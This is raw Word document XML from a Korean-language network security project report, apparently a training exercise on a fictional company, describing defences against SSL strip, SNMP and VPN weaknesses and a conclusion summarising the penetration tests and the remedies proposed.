          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가 되지 않은 모습을 볼 수 있음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SL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>취약점(S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SL Strip Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463320" w:rsidRPr="00463320" w:rsidRDefault="00463320" w:rsidP="00463320">
      <w:pPr>
        <w:ind w:left="800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29D8055D" wp14:editId="5F52942E">
            <wp:extent cx="3599180" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="127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. 공격대상이 될만한 PC의 MAC주소 확인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45" cy="19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11D44F5E" wp14:editId="18F57176">
            <wp:extent cx="3598545" cy="1912620"/>
            <wp:effectExtent l="0" t="0" r="190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 확인된 MAC주소를 라우터에 Static으로 등록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M</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ITM </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">상태가 되지 않도록 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Router</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Static</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARP Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 수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 w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4723652C" wp14:editId="33ED2BF7">
            <wp:extent cx="3600000" cy="1008000"/>
            <wp:effectExtent l="0" t="0" r="635" b="190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0. Client PC에 Static으로 게이트 웨이 주소를 주기 위해 라우터에서 MAC주소 확인.pn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74AFA75" wp14:editId="227744FB">
            <wp:extent cx="3599626" cy="1356360"/>
            <wp:effectExtent l="0" t="0" r="127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1. 알아온 게이트웨이 MAC주소를 이용해 라우팅 테이블에 Static으로 등ㄹ고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38" cy="1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또는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Client PC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RP Table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Static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Gateway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 xml:space="preserve">MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>주소 입력</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F61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463320" w:rsidRPr="00463320" w:rsidRDefault="00463320" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>취약점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noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="637B23E0" wp14:editId="061C2836">
            <wp:extent cx="3598333" cy="23622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ommunity String을 쉽게 알 수 없도록 복잡하게 설정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38" cy="2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noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Community String</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dictionary Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로 쉽게 알아채지 못하도록 숫자와 문자,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기호를 포함하여 복잡하게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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C2DDE8B" wp14:editId="06BF85CB">
            <wp:extent cx="3600000" cy="306000"/>
            <wp:effectExtent l="0" t="0" r="635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. ACL 설정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BB44125" wp14:editId="7D341263">
            <wp:extent cx="3600000" cy="846000"/>
            <wp:effectExtent l="0" t="0" r="635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. 만든 그룹 설정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 관리부의 네트워크만 허용을 해주고 다른 네트워크에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로 접근하게 되면 거부</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F6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463320" w:rsidRDefault="00463320" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0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rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PN </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>취약점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760"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs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B393823" wp14:editId="1D2B6F35">
            <wp:extent cx="3600000" cy="1479600"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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. 먼저 서버와 같은 네트워크에 있던 VPN 서버를 별개의 네트워크로 구성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서버와 같은 네트워크에 구성되어 있던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서버를 별개의 네트워크로 구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463320" w:rsidRDefault="00463320" w:rsidP="00463320">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:noProof/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EDD3268" wp14:editId="76E39978">
            <wp:extent cx="3598322" cy="2391507"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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 VPN서버에서 L2TP 연결에 체크 후 미리 공유한 키 설정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75" cy="24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463320" w:rsidRDefault="00463320" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/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>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2TP </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">연결을 위해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서버 설정에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L2TP </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">연결에 사용자 지정 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IPsec </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>정책 허용 체크 후 미리 공유한 키 설정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B5B84A1" wp14:editId="00FC12D2">
            <wp:extent cx="3596252" cy="1708219"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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 VPN종류를 L2TP로 설정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99" cy="17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F3FF53C" wp14:editId="43AFCE98">
            <wp:extent cx="3598785" cy="1487156"/>
            <wp:effectExtent l="0" t="0" r="1905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 Client PC에도 IPsec설정에 미리 공유한 키 입력.pn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27" cy="14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Pr="00924F61" w:rsidRDefault="00463320" w:rsidP="00924F61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lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lient [</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>지사</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>] PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 와서 사용하고 있던 가상 사설망 속성으로 들어가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 xml:space="preserve">종류를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>L2TP</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로 설정 후 I</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Psec </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>설정에 미리 공유한 키 입력</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463320" w:rsidRDefault="00463320" w:rsidP="00463320">
      <w:pPr>
        <w:ind w:left="760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D05FC2" wp14:editId="4AF68725">
            <wp:extent cx="3594735" cy="1828800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. VPN 연결 시도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43" cy="18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B992590" wp14:editId="5D42C54D">
            <wp:extent cx="3598333" cy="782782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. 연결 성공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83" cy="7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0" w:rsidRDefault="00463320" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr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설정 적용 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VPN </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>연결 시도를 해보면 연결이</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>되는 것 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463320" w:rsidRDefault="00463320" w:rsidP="00463320">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:sz w:val="20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44BA28" wp14:editId="0FA6637B">
            <wp:extent cx="3597168" cy="974690"/>
            <wp:effectExtent l="0" t="0" r="381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. 와이어샤크로 보면 암호화 통신을 하고 있음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36" cy="9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82" w:rsidRPr="00924F61" w:rsidRDefault="00463320" w:rsidP="00924F61">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">연결 과정을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wire Shark</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 확인해보면 </w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidRPr="00463320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로 암호화 통신 하는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F6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82B4F" w:rsidRDefault="00706A82" w:rsidP="00E32B4B">
      <w:pPr>
        <w:pStyle w:val="af0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결론</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:ind w:left="80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지금까지 본 프로젝트에서 가상회사인 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Smile Gate Entertainment</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 대상으로 보안 점검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및 모의 해킹과 그에 따른 대응 조치 설정을 진행하였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및 감사 정책 등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보안 사항 점검과 시스템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웹,</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DB, </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>네트워크로 구분된 모의 해킹을 통해 취약점을 점검하고 대응책을 제시하였습니다.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계정 정책에서는 계정 관리에서 중요한 비밀번호에 대한 설정과 기본 계정인 관리자 및 게스트 계정에 대한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용도에 따른 계정 분리 및 권한 부여에 대해서 확인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감사 정책에서 필요한 로그를 기록하는 설정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백업 일정에 대한 설정 등을 점검했습니다.</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:ind w:left="798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이후 모의 해킹에서는 시스템 보안에서 공격자가 회사 내부 네트워크에 접근이 가능해진 경우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내부 네트워크에서 동작 중인 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 확인하거나 서비스 중인 포트를 확인할 수 있다는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웹 보안에서는 S</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SL </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">설정이 되어 있어서 웹 서버에 대한 접속이 암호화 되어 있더라도 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XSS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 xml:space="preserve">SSL strip </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격에 의해서 세션 쿠키 값이 노출될 수 있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 xml:space="preserve">그 쿠키 값을 이용해 요청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을 변조해서 탈취한 계정의 권한을 사용하는 것이 가능하다는 것과</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Brute Forcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 이용해서 계정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정보를 알아내는 공격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웹 보안과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 xml:space="preserve">보안과 관련해서는 웹 사이트에 값을 넘겨주는 과정에서 발생하는 취약점을 이용해서 서비스 이용자에게 공격을 하고 서비스 이용자가 자기도 모르게 자기 권한으로 공격자가 의도한 작업을 하게 하거나 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DB </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>정보를 알아내는 등의 공격이 가능한 것을 확인했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:ind w:left="794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마지막으로 네트워크 보안에서는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARP Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MITM </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">상태를 기반으로 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IP Spoofing, DHCP Spoofing, DNS Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">등 다양한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Spoofing </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격이 가능했고,</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DHCP Starvation</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 같은 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격,</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSL Strip </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이나 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VPN Sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">과 같이 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 암호화 관련 취약점에 대해서 알아보았습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:ind w:left="794" w:firstLineChars="1" w:firstLine="2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 xml:space="preserve">프로젝트 과정에서 성공한 공격들에 대해서 방어에 필요한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PC </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>설정을 확인하고 사용 가능한 보안 장비를 이용해서 공격을 방어하는 방법과 직접</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Secure Coding</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 등을 통해서 공격에 대응하는 방법을 확인했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:ind w:left="794" w:firstLineChars="1" w:firstLine="2"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82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706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>의의 및 한계</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
